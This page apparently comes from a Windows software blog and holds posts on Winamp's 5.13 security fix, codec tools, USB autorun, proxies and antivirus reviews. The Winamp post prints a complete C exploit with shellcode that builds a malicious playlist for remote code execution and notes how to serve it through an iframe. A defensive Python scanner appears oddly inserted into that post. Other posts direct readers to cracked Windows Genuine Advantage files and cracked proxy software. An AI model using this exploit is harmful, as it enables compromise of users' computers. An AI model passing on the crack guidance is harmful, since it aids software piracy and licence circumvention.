Category: Computer

  • Winamp 5.13 Released – Fixes extremely critical security flaw

    Nullsoft released Winamp version 5.13 on 1/30/06, which fixes an “EXTREMELY” critical security vulnerability in the in_mp3 plugin.
    Everyone is strongly recommended to update to the latest version.


    ATmaCA has discovered a vulnerability in Winamp, which can be exploited by malicious people to compromise a user’s system.
    The vulnerability is caused due to a boundary error during the handling of filenames including a UNC path with a long computer name. This can be exploited to cause a buffer overflow via a specially crafted playlist containing a filename with an overly long computer name (about 1040 bytes).
    Successful exploitation allows execution of arbitrary code on a user’s system when e.g. a malicious website is visited.
    The vulnerability has been confirmed in version 5.12. Other versions may also be affected.
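
    The advisory text above translates directly into a check that can be run on playlist files before they are opened. The following is an added example, not code from the original post or from Nullsoft: it scans .pls data for FileN= entries whose UNC computer name is longer than any legal host name. The 255-byte threshold, the function names and the sample playlist are assumptions constructed for illustration, and the check for non-printable bytes goes slightly beyond the length condition the advisory describes.

```python
import re
from dataclasses import dataclass
from typing import List

# Assumption: 255 bytes is the longest legal DNS host name (NetBIOS names are
# at most 15 bytes), so anything longer in a UNC path is never legitimate.
MAX_HOST_LEN = 255

# "File<N>=<value>" lines of a .pls playlist, matched on raw bytes because a
# hostile file may contain arbitrary binary data.
_FILE_ENTRY = re.compile(rb"^\s*File(\d+)\s*=(.*)$", re.IGNORECASE)
# UNC prefix: two slashes or backslashes, then the computer name up to the
# next path separator.
_UNC = re.compile(rb"^[\\/]{2}([^\\/]*)")


@dataclass
class Finding:
    entry: int      # N from FileN=
    host_len: int   # length in bytes of the UNC computer name
    reason: str


def scan_pls(data: bytes, max_host_len: int = MAX_HOST_LEN) -> List[Finding]:
    """Return one Finding per suspicious FileN= entry in .pls data."""
    findings = []
    for raw in data.splitlines():
        m = _FILE_ENTRY.match(raw)
        if not m:
            continue
        entry, value = int(m.group(1)), m.group(2).strip()
        unc = _UNC.match(value)
        if not unc:
            continue  # local path or URL, not a UNC path
        host = unc.group(1)
        if len(host) > max_host_len:
            findings.append(
                Finding(entry, len(host), "UNC computer name too long"))
        elif any(b < 0x20 or b > 0x7E for b in host):
            findings.append(
                Finding(entry, len(host),
                        "non-printable bytes in UNC computer name"))
    return findings


# Constructed sample playlist: a local file, a normal UNC path, and a UNC path
# whose computer name is 1040 bytes of filler (the length the advisory cites).
SAMPLE = (
    b"[playlist]\r\n"
    b"File1=C:\\Music\\track01.mp3\r\n"
    b"File2=\\\\mediabox\\music\\track02.mp3\r\n"
    b"File3=\\\\" + b"A" * 1040 + b"\\share\\track03.mp3\r\n"
    b"NumberOfEntries=3\r\nVersion=2\r\n"
)

if __name__ == "__main__":
    for f in scan_pls(SAMPLE):
        print(f"File{f.entry}: {f.reason} ({f.host_len} bytes)")
```

    The same function can be pointed at playlists pulled from a mail gateway, proxy cache or download folder by reading each file in binary mode and passing the bytes to scan_pls().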

    [ Download Winamp v5.13 Setup ]
    Alternatively, you can download the in_mp3.dll and place it in your Winamp\Plugins folder.

    For computer security wizards, you can take a look at the exploit code below.
    I do not take any responsibility for anything that can be or has been done with the code below, as it is widely and publicly available.

    /*
    *
    * Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
    * Bug discovered & exploit coded by ATmaCA
    * Web: http://www.spyinstructors.com && http://www.atmacasoft.com
    * E-Mail: [email protected]
    * Credit to Kozan
    *
    */

    /*
    *
    * Tested with :
    * Winamp 5.12 on Win XP Pro Sp2
    *
    */

    /*
    * Usage:
    *
    * Execute exploit, it will create “crafted.pls” in current directory.
    * Duble click the file, or single click right and then select “open”.
    * And Winamp will launch a Calculator (calc.exe)
    *
    */

    /*
    *
    * For to use it remotely,
    * make a html page containing an iframe linking to the .pls file.
    *
    * http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
    *
    */

    #include
    #include

    #define BUF_LEN 0x045D
    #define PLAYLIST_FILE “crafted.pls”

    char szPlayListHeader1[] = “\r\nFile1=”;
    char szPlayListHeader2[] = “\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n”;

    // Jump to shellcode
    char jumpcode[] = “\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4″;

    // Harmless Calc.exe
    char shellcode[] =
    “\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02″
    “\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48″
    “\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4″
    “\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12″
    “\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69″
    “\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6″
    “\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5″
    “\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21″
    “\x61\xdd\x0e\x4d”;

    int main(int argc,char *argv[])
    {
    printf(“\nWinamp 5.12 Remote Buffer Overflow Universal Exploit”);
    printf(“\nBug discovered & exploit coded by ATmaCA”);
    printf(“\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com”);
    printf(“\nE-Mail: [email protected]”);
    printf(“\nCredit to Kozan”);

    FILE *File;
    char *pszBuffer;

    if ( (File = fopen(PLAYLIST_FILE,”w+b”)) == NULL ) {
    printf(“\n [Err:] fopen()”);
    exit(1);
    }

    pszBuffer = (char*)malloc(BUF_LEN);
    memset(pszBuffer,0×90,BUF_LEN);
    memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
    memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
    memcpy(pszBuffer+0×0412,jumpcode,sizeof(jumpcode)-1);
    memcpy(pszBuffer+0×0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

    fwrite(pszBuffer, BUF_LEN, 1,File);
    fclose(File);

    printf(“\n\n” PLAYLIST_FILE ” has been created in the current directory.\n”);
    return 1;
    }

    // milw0rm.com [2006-01-29]

  • Determine Audio & Video Codec Required To Play Downloaded Movies

    I’ve seen many cases where movies downloaded from the Internet can’t be played properly… A normal downloaded movie is around 700MB and it takes hours to finish downloading. It’s surely frustrating to waste hours downloading a movie that you eagerly want to watch, only to get the sound but no video. Or, you get only the video but no sound. You’ll be cursing the person who ripped the video and uploaded the video file.

    Before doing that and deleting the downloaded movie, you are very likely to be able to play the movie perfectly with both audio and video IF you have the correct codec installed. A codec is a device or program capable of performing encoding and decoding on a digital data stream or signal. Different rippers use different codecs to rip the movie off a CD or DVD. So in order to play it correctly, you need to install the codec that was used to rip the disc.

    Thankfully there are a few good tools that supply technical and tag information about a video or audio file.


    I found 3 free tools that are able to tell you what codec is necessary in order to play a video or audio file.

    1. MediaInfo
    When you load a movie file into MediaInfo, it’ll give you the following information.
    General: title, author, director, album, track number, date, duration…
    Video: codec, aspect, fps, bitrate…
    Audio: codec, sample rate, channels, language, bitrate…
    Text: language of subtitle
    Chapters: number of chapters, list of chapters

    I like this tool because it doesn’t complicate things by giving you unnecessary information. Simply load the movie file and it’ll detect which video and audio codecs are required to play it. There’s a button on the main interface that you can click to go to the official website of the video codec or audio codec. Download the codec, install it and you’re all set to watch the downloaded video.

    [ Download MediaInfo ]

    2. AVIcodec
    AVIcodec is able to tell you the codec required and where to download it. It is able to read AVI & DIVX, ASF & WMV, Real (.rm, .rmvb), Ogg (.ogg, .ogm), Mpeg-(S)VCD-DVD (.mpg, .vob), FLV and all those handled by DirectShow (.mp3, …). Just load the video or audio file, and it will show you the information. Clicking on the small “web” button will bring you to the official website to download the codec.

    Current AVIcodec version is quite outdated. There’s a newer version for beta test which is said to be available till end of March 2007, but it’s still available. Looks like AVIcodec is not actively being developed.

    [ Download AVIcodec ]

    3. afreeCodecVT
    Easily determine the Audio and Video codec required to view your video. Once the codec or problem is determined; you may easily search for the codec or tool to solve your issue using the software.

    Only reads AVI files. It doesn’t bring you to the official website to download the required codecs. Searching for codec download links in afreeCodec and afreeDLL doesn’t work. The link where it says “View a scenario in which afreeCodecVT is used to solve a issue.” in the HELP section doesn’t work. The Codec wizard doesn’t work either. A lot of functions in this tool will bring you to afreeCodecVT’s website, but I think the website has changed and this tool doesn’t point to the correct page.

    [ Download afreeCodecVT ]

    4. GSpot
    There is no need to install GSpot. Just download, extract and run GSpot.exe. GSpot is able to tell you whether you’ve installed the codec required to play the movie file you examine. If it says “Codec(s) are Installed”, then you can play without problems. If it says “Codec(s) are NOT Installed”, then you have to manually search for the codecs in Google. It would be nice if it had a database of direct links to download the required codecs.

    [ Download GSpot ]

    Of the 4 codec recognition tools above, I prefer to use MediaInfo. It supports many types of files and recognizes many codecs. MediaInfo is actively being developed and doesn’t require any installation. It also brings you to the correct website to download the official required codec.

    Update: Sorry guys, totally forgotten about GSpot which is the most famous of them all. Just updated this post with GSpot.


  • Windows Genuine Advantage Validation v1.5.554.0 and v1.5.708.0 Cracked

    I found cracks for Windows Genuine Advantage Validation v1.5.554 and v1.5.708. I went to Windows Update and didn’t find any KB905474 updates as I am still using WGA 1.5.540. Team CRUDE cracked Windows Genuine Advantage Validation v1.5.554 on 2nd October 2006 and they claimed that it is the newest Windows Genuine Advantage from Microsoft. A day later on 3rd October 2006, Team ETH0 released a newer version which is v1.5.708 and they claim that this is the same crack that Microsoft shipped with their Windows XP release some days ago.

    Anyway, if you’ve installed either of the WGA versions above, you can get the cracks at the end of this post.


    Team CRUDE’s crack for Windows Genuine Advantage Validation v1.5.554.0 contains cracked LegitCheckControl.dll, WgaLogon.dll and WgaTray.exe. You need to replace the files in your Windows System32 directory. If it says that the file is in use, you’ll need to boot into Safe Mode to replace the files.

    As for Team ETH0, it comes with LegitCheckControl.DLL, WgaLogon.dll, WgaTray.exe and an additional batch file installer.bat. Just run the installer.bat file and it will auto kill wgatray.exe process and auto replace LegitCheckControl.DLL, WgaLogon.dll and WgaTray.exe file. Much simpler.

    Remember, Team CRUDE’s crack is for WGA v1.5.554 and Team ETH0’s crack is for WGA v1.5.708. Don’t confuse the two versions! I noticed that Team ETH0’s LegitCheckControl.dll doesn’t have Digital Signatures on it when viewing the file properties.

    [Download Team CRUDE Windows Genuine Advantage Validation v1.5.554.0]
    [Download Team ETH0 Windows Genuine Advantage Validation v1.5.708.0]

  • WinBootInfo is a BootVis Alternative that Works in Windows Vista and 7

    Some of you have probably heard of BootVis, which can be used to check how long a Windows XP machine takes to boot, and then to optimize the boot process, sometimes considerably reducing the time required. BootVis is a very useful tool, but unfortunately it only works in Windows XP and is no longer supported by Microsoft. There is an alternative called Boot Log XP, which is shareware. It is easier to use than BootVis and gives you important information about started drivers, running processes and loaded DLLs. Boot Log XP also only works on XP because it extracts information from the binary ETL file (as BootVis does) and interprets the results using its own method.
    The author of Boot Log XP claims that they are working on a new version which will support XP-64 and Windows Vista/Seven, but it’s been a long time since they posted that on their website, without any updates. So if you’re on Windows Vista or 7, you can use WinBootInfo as a BootVis alternative.


    WinBootInfo is the advanced Windows Boot Analyzer that logs drivers and applications loaded during system boot, measures Windows boot times, records CPU and I/O activity during the boot, and much more! With WinBootInfo, you get to know what actually happens during Windows boot and what process is taking up a long time to start that makes Windows bootup time slower.

    WinBootInfo Features:

    • Windows Boot Time Logging
    • Detailed information about loaded drivers, applications and system DLLs
    • Each loaded system component is displayed on the detailed time map
    • Tree-View of Loaded Processes sorted in time, with all belonging DLLs/Drivers
    • Different times logged (boot to Login Prompt, Explorer, Session Manager)
    • Detailed CPU utilization tracking during boot, per every CPU core
    • I/O activity tracking during boot
    • System Interrupt / Context Switch tracking during boot
    • Text Log generation and Printing
    • History Feature, for comparing current with the past boot results

    WinBootInfo is very easy to use. The first time you run it, the program will inform you that there is no boot analysis data recorded and ask if you want WinBootInfo to log your next Windows boot and collect boot information for analysis.

    Clicking Yes will schedule WinBootInfo to track what is being loaded at next restart. The screenshot below shows boot performance. The Boot Process Tree which is on the left shows the process being loaded in order by Windows during startup. In the middle it has detailed boot load history for drivers and applications, and at the bottom it also shows the CPU and disk utilization history during boot.

    WinBootInfo only tells you what is being loaded, and you will need other software such as Autoruns to disable a process from startup. WinBootInfo is probably the ONLY software in the world that is able to do what it does unless BootLogXP is able to come up with a new version… It costs $14.95 to purchase a single license but you can use it for a 30 day free trial without limitations. Although the product page did not mention that it supports Windows 7, I’ve got confirmation from the author of WinBootInfo that it does. In fact I’ve personally tested WinBootInfo on my Windows 7 Ultimate 32bit and it works perfectly.

    [ Download WinBootInfo ]

  • How to Make Windows Autorun USB Flash Drives

    If you didn’t know, Microsoft Windows does not allow you to autorun USB drives when they are inserted. The Windows Autorun capabilities are restricted to CD-ROM drives and fixed disk drives. No, there are no registry hacks to enable USB drives autorun feature because of security issues. Data theft is one security concern for example. The simplicity of reading and writing to basic USB drives and the reasonable amount of data they can hold makes them an ideal target for this.

    Usually when you plug in your USB flash drive, you’ll get a notification asking what you would like to do.
    If you end the “Explorer.exe” process and plug in your USB flash drive, you won’t even get the prompt. Usually computers that are used for giving exams won’t have “explorer.exe” loaded and that can prevent you from copying the exam data out.

    Anyway, if you would still like to automatically launch the program of your choice on your USB flash drive every time you plug it into your computer, then please continue reading. There is a way to make Windows autorun USB flash drives.


    Since Windows does not allow a flash drive to automatically execute any programs, we’ll turn to 3rd party software to do that. I found a few and here is what I have to say about them.

    1. AutoRun USB
    If you visit the AutoRun USB official website now, they are no longer offering a free version of AutoRun USB. Their latest version of AutoRun USB is version 4 and it costs $4.99. But if you don’t mind using their first version of AutoRun USB, then you can use it for FREE. One thing I don’t like about AutoRun USB is that it recognizes autorun.usb instead of autorun.inf. Why don’t they make it standard? You need to manually copy the autorun.usb from C:\Program Files\AutoRun USB to the root of your USB flash drive and edit it with Notepad.

    [ Download AutoRun USB v1.0 ]

    2. BusRunner
    If you think AutoRun USB is bad, this is even worse! First of all, I can’t find anything about BusRunner on the official website. Looks like they’ve removed it for good! Next, after installing BusRunner, I see an icon appear in the tray bar. When I plug in my USB flash drive, I can right click on the icon to set the default program to run when it’s plugged in. After I did that, I wasn’t able to safely remove my USB flash drive. I get the error message “Problem Ejecting USB Mass Storage Device. The device ‘Generic volume’ cannot be stopped right now. Try stopping the device again later.” No matter how long I wait, I still can’t safely eject my USB flash drive. The only safe way to eject my USB flash drive is to close BusRunner first; only then am I able to safely remove it. Oh, and BusRunner also doesn’t recognize Autorun.inf. It uses a BusRunner.cfg file at the root of your USB flash drive.

    [ Download BusRunner ]

    3. APO USB Autorun
    This is the best compared with the first two programs that can make Windows autorun USB flash drives. APO USB Autorun recognizes the standard autorun.inf (as used with CDs) and executes it. If you don’t know how to write an autorun.inf file, this software includes an autorun.inf builder. In addition to the autorun functionality, the program also allows you to quickly access the files on the USB drive(s) from the tray icon menu. APO USB Autorun now comes with plugins to backup/restore a folder upon drive insertion.

    [ Download APO USB Autorun ]

  • Enable Show My Webcam on Windows Live Messenger 2009 Workaround

    In December last year I found out about Windows Live Messenger 2009 and mistakenly thought it was the official final version, but it was actually a public beta. Anyway, I installed it on my laptop and have been using it until today. So far it has been perfect and I never had any problems with it. While I was back in my home town for two weeks last month, I wanted to see my wife from the webcam in her laptop but the “Show my webcam” option was grayed out. I used TeamViewer to remotely control the computer and ran Audio and video setup, and the webcam test was fine… Weirdly, “Start a video call” worked as well.

    As you all know, the Internet connection in my hometown is really slow and the video call between me and my wife is terribly slow and I could only see her 1 frame in . I didn’t want to use video call because it requires more bandwidth to transfer both audio and video compared to Show My Webcam which only streams the video. I wasn’t able to find a solution at that time but today I’ve found a workaround to enable Show My Webcam on Windows Live Messenger 2009.


    Only my new Acer laptop running Windows Vista with Windows Live Messenger 2009 has the missing show my webcam problem; it was fine on my old laptop that’s running Windows XP with Windows Live Messenger 2009. The first thing I did was to uninstall WLM 2009 and then reinstall it, but no go. Then I thought that the problem could be caused by the Acer Crystal Eye Webcam software that is installed by default, so I uninstalled it but still couldn’t use the show my webcam option. I also read that antivirus could cause such problems. I terminated Kaspersky Antivirus 2009, all connections were reset and I had to reconnect Windows Live Messenger 2009. Suddenly the Show my webcam option was AVAILABLE! I then tried to show my webcam and it worked!

    OK I hit the jackpot and thought it was Kaspersky but I was wrong. I rebooted the computer, terminated Kaspersky, ran Windows Live Messenger 2009, connected but this time the show my webcam option is again unavailable. I had to uninstall Kaspersky to confirm that it is not the cause of the problem but still the same. So it’s not Kaspersky…

    After further testing, I found out that the show my webcam will be available after syncing the Windows Live Messenger 2009 connection. What you need to do is to run Windows Live Messenger 2009 and sign in as usual. Once you’re signed in, click the small button on the top right, select File > Sign Out.

    When you’ve successfully signed out, sign in again. Weirdly that will enable the show my webcam option.

    There’s no such problem on my old laptop, on which I manually installed Windows XP and Vista, with an external webcam. I am not sure what the cause of this problem is, but I believe it has something to do with either some of the software/drivers pre-installed by Acer or the built-in webcam on my new laptop. Well, Windows Live Messenger 2009 is still in public beta, so it is expected to have some bugs. With this workaround, I don’t need to revert to the old Messenger 8.5 and can continue using the beautiful Windows Live Messenger 2009 😉

  • Scan Files With 22 Antivirus Without Downloading to Computer

    The usual way to find out whether a file contains a virus is to download the file to our computer first and then let the antivirus installed on our computer do the job. Another method is to download the suspicious file to our computer and then upload it to VirusTotal or an independent antivirus website for scanning. I got a little upset yesterday when I wanted to send a friend a link to an archive (.zip) file containing photos taken during my wedding. The first thing she asked was: is that a virus? Are you sending something awful to me? Even after I said that it was my wedding photos, she still didn’t dare to download it because her computer friend told her not to simply download stuff from the Internet…

    I don’t know what kind of computer friend she has, but I am sure he/she is a newbie who is just too afraid to download anything over the Internet, even from a trusted friend. If one antivirus doesn’t give her any confidence, then maybe over 40 antivirus engines in VirusTotal scanning that one file should do it. However, that requires her to download the file to her computer first. To solve this problem, here’s a way to scan files with 22 antivirus engines without first downloading them to your computer.


    NoVirusThanks, a website that offers a free service to analyze your file with 22 AntiVirus Engines and report back the analysis result, has now added a new feature to scan a web address. Last year I wrote about NoVirusThanks, but back then it didn’t have this feature.

    The new “Scan Web Address” option allows users to scan a file before they download it to their own computer. You can scan, for example, the file located at www.site.com/file.exe before downloading it to your computer. It can also be used to scan a single web page (.html/.php/.js) with all the antivirus engines. When a direct download link to a file is hidden, Scan Web Address can also handle the redirection or any changes in the filename. Other than that, the online scanning feature by NoVirusThanks has recently been optimized for stability and has an improved binder detector.

    Let me walk you through how to scan a file without downloading it to your computer using NoVirusThanks.

    1. Find the link that you want to scan. Let’s take DPC Latency Checker for an example. Visit the official DPC Latency Checker download page.

    2. Right click on the link that lets you download the file and select Copy Link Location.

    3. Now go to NoVirusThanks and click Scan Web Address tab.

    4. Right click on the box just below the text that says “Web Address to Scan”, select Paste and finally click the Submit Address button.

    5. Wait for about a minute and you will have your report on how many antivirus engines detected the file as infected.

    The advantage of this feature is that it saves you time and bandwidth if you are on a limited plan from your ISP. Other than that, people who are afraid of downloading files over the Internet can now feel safer about downloading. I believe the maximum file size limit to scan is 20MB. I tried scanning the Kaspersky Anti-Virus 2010 v9.0.0.463 installer file (kav9.0.0.463en.exe) but got the error “Could not fetch the requested address: Failed writing body”.

  • Collection of Extensions to Turn Firefox Into a Security Platform

    We all know that we can do nearly everything with Firefox browser. We can check emails, download torrents, upload files to FTP, and the list goes on… Did you know that there’s a collection of extensions to turn your Firefox browser into a security platform? FireCAT stands for FireFox Catalog of Auditing Toolbox and it is a Firefox Framework Map collection of the most useful security oriented extensions. It can be used to turn your favorite browser (Firefox) into a powerful security framework.


    At first I thought that FireCAT is a Firefox plugin which you can install and automatically have all 60 security extensions but I was wrong. The official website has 3 types of FireCAT files, FireCAT 1.2 Source (FreeMind), FireCAT 1.2 HTML Browsable and FireCAT 1.2 PDF. Just download the HTML browsable file and you’ll see 7 categories. Expanding the category will give you the place to download the specific extension.

    1. Information Gathering
    2. Proxying / Web Utilities
    3. Editors
    4. Security auditing
    5. Network Utilities
    6. Misc
    7. IT Security Related

    If you don’t want to try those security extensions on your Firefox browser because they might affect your browser speed, then I suggest you install them on a Portable Firefox. This way you can have a clean and fast Firefox for browsing and another Firefox for security auditing. Do take note that you can only run either the installed Firefox on your system or the Portable Firefox at a time.

    So which is your favorite Firefox security extension featured in FireCAT?

    [ Download FireCAT 1.2 HTML | PDF ]

  • DenyBuddy & No-Buddy

    I’ve found two applications that are classified as Deny-A-Buddy programs (DenyBuddy & No-Buddy), which allow you to remove your Yahoo! ID from someone else’s buddy list. Quick and effective…

    Simply log in to the name you need to remove, then enter the ID of the person whose list you need to remove your name from, and then remove it.


    1. DenyBuddy
    [ Download DenyBuddy ]

    2. No-Buddy
    [ Download No-Buddy ]

    I personally prefer to use DenyBuddy because it has better status reporting than No-Buddy. It will tell you when you’ve signed on, when you’ve removed your Yahoo! ID from someone else’s buddy list, and even when the application is closing. The DenyBuddy Graphical User Interface (GUI) also looks better than No-Buddy’s.

  • Route All Internet Software and Game Connection Through Open Proxy Servers

    An open proxy is a proxy server which is accessible by any Internet user. Generally, a proxy server allows users within a network group to store and forward internet services such as DNS or web pages so that the bandwidth used by the group is reduced and controlled. With an “open” proxy, however, any user on the Internet is able to use this forwarding service. Most of the time the owner of the proxy server doesn’t know that he/she is running an “open” proxy, because it results from misconfiguration of the proxy software. I still remember that the first IT company that I worked in 10 years ago had a Microsoft Proxy server in the network and it was an open proxy.

    An open proxy is most commonly used to mask the user’s IP address. This could be to bypass censorship, for privacy, or even to avoid detection. To be able to use the open proxy, software such as Internet Explorer must support using a proxy server. Go to Tools > Internet Options > Connections tab > LAN settings. Check “Use a proxy server for your LAN” and enter the proxy IP address and port. Now when you surf the web, the site can’t see your original IP address. Check out the animation below. I visit www.cmyip.com to view my original IP address. Then I configure Internet Explorer to use an open proxy. Refreshing the www.cmyip.com website shows the open proxy instead of my original IP.

    Unfortunately not all software supports a proxy server. If for some reason you need a piece of software to go through a proxy server, here are some third party programs that you can use to tunnel Windows applications through proxy servers.


    There are some freeware tools such as FreeCap, Hummingbird and SocksCap which are able to redirect connections from programs through a SOCKS or proxy server. I am not going to talk about the free proxy tunneling software because some of it can be really tough to configure for a basic computer user.

    However, the paid ones such as Proxifier, ProxyCap and WideCap are way easier to configure and use. So let’s take a look at it.

    1. Proxifier
    – Proxifier is a program that allows network applications that do not support working through proxy servers to operate through an HTTPS or SOCKS proxy or a chain of proxy servers. With Proxifier you can easily tunnel all connections on the system or separate applications. By default, Proxifier will tunnel all connections automatically after the installation. No configuration is needed; however, you’ll need to look for open proxy servers and add them to the proxy settings. The latest Proxifier v2.7 costs $39.95 for a single user license, but it has been cracked by MAZE (Proxifier.v2.7.Cracked-MAZE)

    [ Download Proxifier ]

    2. ProxyCap
    – ProxyCap enables you to tunnel Internet applications through HTTP, SOCKS v4, and SOCKS v5 Proxy Servers. You can tell ProxyCap which applications will connect to the Internet through a proxy and under what circumstances. This is done through a user friendly interface, without the need to reconfigure any of your Internet clients. ProxyCap provides a flexible rule system and allows you to define your own “tunneling” rules. After installation, you’ll need to add a proxy server and then set a rule for whether to allow all or only specified programs to tunnel through the proxy server. The latest ProxyCap v3.15 costs $30 for a single user license but has been cracked by NJOY from Revenge Crew (ProxyCap.3.15.Crack-REV)

    [ Download ProxyCap ]

    3. WideCap
    – WideCap is a system proxifier. It was created as an extended version of the FreeCap program with a fully rewritten proxy engine to handle reloading everything on-the-fly. WideCap is a fully functional Winsock Service and Namespace provider. That means simple integration into your network subsystem. FreeCap uses injection technology which could cause errors and incompatibility problems with some firewalls and anti-viruses. WideCap acts as a virtual network driver covering all your TCP/IP activity. No launchers – just run your program as usual and work via proxy. I spent half an hour trying to get WideCap to work because I was unable to get the rules working. Finally I found out that I need to add ANY for the address that should go through the proxy. The latest version of WideCap v1.4 costs $20 for 1 license but also has been cracked by lord_Phoenix from Revenge Crew (widecap.1.4.0.539.read.nfo.cracked.exe-rev).

    [ Download WideCap ]

    Proxifier is the easiest to use with no configuration needed while WideCap is the most advanced proxy tunneling software if compared with the other two. Do take note that WideCap conflicts with other proxy tunneling software. I had to uninstall Proxifier and ProxyCap to get WideCap working.

  • Unofficial update: MSN Messenger 7.5.0324

    John Weis, Software Test Engineer for MSN Messenger, posted an update to the now official 7.5.0322 version.
    Build 324 only includes a one-line fix, but if you’re still having problems with 322 you’re advised to try this one.
    Important Note: If your 322 is working fine, you don’t have to upgrade.

    [ Download MSN Messenger 7.5.0324 (unofficial, English-only build) ]

    9 February 2006 Update: 7.5.0.324 is now OFFICIAL! Download the OFFICIAL MSN Messenger 7.5.0.324 at this link.

  • Today Only: Free Zemana AntiLogger License for EVERYONE

    I personally think that keyloggers are the scariest threat. Imagine all your passwords being captured and the person who installed the keylogger being able to access all your password protected websites such as your emails, PayPal, online banking, etc. One of the most effective methods to counter keyloggers is by using Zemana AntiLogger.


    Zemana AntiLogger is one of the security products that I’ve recommended and will continue to recommend to everyone. The last time I tested Zemana AntiLogger, it was able to block virtually ALL keylogging, webcam capture and screenshot capture methods from different trojans. A year has gone by and again I’ve tested Zemana AntiLogger with 2 keyloggers (one of them uses a rootkit method and the other advertises that it is completely invisible, bypassing antivirus and firewall) and 1 trojan crypted with Incognito which bypassed many antivirus and internet security products. Zemana AntiLogger was able to detect injection on both of the keyloggers and the trojan while successfully blocking the installation of those dangerous files.

    Zemana has collaborated with Softpedia to offer everyone FREE license for Zemana AntiLogger ONLY FOR TODAY. Hurry and grab your license as soon as possible.


    To get your free Zemana AntiLogger license worth $39.50:
    1. Go to this page http://www.zemana.com/softpedia/
    2. Click the FREE Full Version Download Now button to download the installer AntiLogger_SOFTPEDIA_1.9.2.185.exe
    3. Install and reboot your computer
    4. Activate the program by following the on-screen instructions.

    Zemana AntiLogger is easy to use. Just install and let it protect your computer. It is made to protect your computer real-time without relying on virus signatures so you won’t find any Scan button. Most if not all injections are threats, so if you get such warnings, make sure you block them first.

    I believe the installer is custom built for Softpedia and has the license number integrated to activate the program. I am not sure whether it is still possible to continue activating the license using the custom installer when this promo has expired. If the activation is limited to only today, that means if we reformat our hard drive we wouldn’t be able to use Zemana AntiLogger for free anymore. I did some tracing and found that the activated license information is stored in C:\Program Files\AntiLogger\config.cfg. You can back up the config.cfg and restore it at a later time IF the online activation blocks the SOFTPEDIA-OEM-12809 license number. If you are starting to think about piracy using the config.cfg, you will not succeed because the license is hardware dependent and if you transfer the config.cfg to another computer, it won’t work.

    One thing I noticed about Zemana AntiLogger is that it doesn’t aggressively check the current processes for threats. One example is, I am using Input Director to share keyboard and mouse between computers and it took a while before Zemana found out that Input Director is capturing the screen. Not to worry, because I’ve tried turning off Zemana and then installing a keylogger that auto uploads captured data, but I waited 30 minutes and still didn’t receive any captured data. I assume that although Zemana AntiLogger hasn’t detected the threat, it can block sensitive data from being transferred.

    You can install and run Zemana AntiLogger together with your antivirus. Check here for a list of compatible security products. You have no idea how many undetectable threats are out there today, and relying solely on antivirus is not enough to keep your personal data safe. Go tell your friends and families about this promotion.

    Update: Zemana AntiLogger is only compatible with Windows XP with Service Pack 2 or higher, Vista and 7 32 bit ONLY. AntiLogger is not available for 64-bit Windows.

  • DefenseWall Personal Firewall v3 Review with 75 License Giveaway

    If you go to the official DefenseWall website at SoftSphere Technologies, you will find DefenseWall HIPS v2.56 but not the Personal Firewall v3 version. That’s because v2.56 is about to be dropped and replaced with the new DefenseWall Personal Firewall v3. I’ve long heard of DefenseWall but had never given it a try, but since I’ve been contacted by people from SoftSphere to do a review on v3, I’ve decided to test it out. DefenseWall claims to protect you from malicious software (spyware, botnets, adware, keyloggers, rootkits, etc.) and identity theft that cannot be stopped by your anti-virus and anti-spyware programs when you surf the Internet.


    I’ve been testing a lot of antivirus software and this is actually my first time testing HIPS software. This is nothing like the normal antivirus that you use. Viruses normally come in to your computer from either the web browser, email, USB drives or the network. If you disable all of them, it’s impossible for your computer to be infected by a virus, but who can live without an internet connection nowadays? So what DefenseWall does is label all applications that come from locations where a virus can come in as “Untrusted” and run them with limited rights in a virtual zone that is specially allocated for them.


    Here is an example. Let’s say you downloaded a file using BitTorrent. You scanned it with your antivirus and it didn’t warn you that it is a threat. Then you ran it thinking that it’s safe, and the virus started to modify system settings such as disabling Windows Task Manager and regedit, adding an autostartup entry for the virus, etc. Thanks to DefenseWall, you have nothing to be afraid of because all the damage done by the virus only affects the virtual zone and not your real Windows system. With only a reboot, your system is back to normal and the damage done by the virus is undone. Now this is very different from system snapshot software because a snapshot reverts everything back to a specific date. As for DefenseWall, everything is still intact except for the damage that the virus seems to have done. That is how HIPS software is supposed to work according to the description and manual. I’ve put DefenseWall to the test and it managed to block the threat in some way or another.

    Test 1: Install Rootkit based Keylogger
    There is a keylogger that goes by the name of All In One Keylogger for Windows by RelyTec. It uses a rootkit method to hide itself so that it is harder to detect. When I downloaded it using Firefox, the keylogger installer file was automatically labeled as an Untrusted file. I installed it and after a few seconds DefenseWall told me that it found a process reading keystrokes via the GetKeyState method.
    I clicked the Terminate button and the keylogger process immediately got terminated. I rebooted the computer and the keylogger is no longer running but the files are still in the computer. As long as the keylogger doesn’t auto load when Windows is booted up, then you’re safe.

    Test 2: Install Keylogger that bypasses antivirus and firewall
